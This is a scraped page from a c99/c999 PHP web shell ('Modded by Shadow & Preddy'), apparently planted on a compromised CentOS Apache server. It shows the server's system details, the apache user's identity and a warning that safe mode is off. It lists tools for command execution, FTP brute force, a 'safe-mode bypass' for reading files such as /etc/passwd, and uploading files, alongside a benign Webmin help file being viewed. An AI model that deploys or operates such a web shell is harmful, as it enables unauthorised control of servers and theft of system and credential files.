!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/custom/help/   drwxr-xr-x
Free 50.87 GB of 127.8 GB (39.81%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     cmd.html (2.45 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Each command has a description (displayed on the button on the main page), and an actual command to execute. This command string can contain shell operators like |, > and ; for executing multiple commands and pipelines. The string can also contain parameters like $foo, which are replaced by user inputs when the command is run.

These parameters can be entered into the table at the bottom of the page. For each parameter you must enter :

Name
A unique code for this parameter. If the name is foo, then $foo will be replaced by the parameter value when the command is executed.

Description
The description next to this parameter on the main page.

Type
This option controls how the parameter is input. Available options are :
  • Text
    A totally free-text input.
  • User
    A username from your system.
  • UID
    The UID of a user from your system.
  • Group
    A group name from your system.
  • GID
    The GID of a group from your system.
  • File
    The full path to a file.
  • Directory
    The full path to a directory.
  • Option
    A Yes/No input that will set the parameter to whatever is in the field next to the type input only if Yes is chosen.
  • Password
    A totally free-text input, but with the password replaced by *'s.
  • Menu
    A drop-down menu of options, taken from the filename entered into the text field to it. Or, instead of a filename you can enter a command with an | at the end, whose output will be used to determine the available options.
  • Upload
    An input box for selecting a file on the client side, which will be uploaded to the server when the command is run. This will be be placed in a temporary file, and the path to that file will be the value of this parameter when the command is run.
  • Textbox
    A multi-line free text field. When the command is run, any newline characters in the entered text will be converted into spaces.

In most cases, the default value for the parameter will be whatever you enter in the text box next to the parameter type menu.

Quote parameter?
If Yes, the parameter will be quoted with " before substitution, allowing the user to enter values containing whitespaces.



:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0087 ]--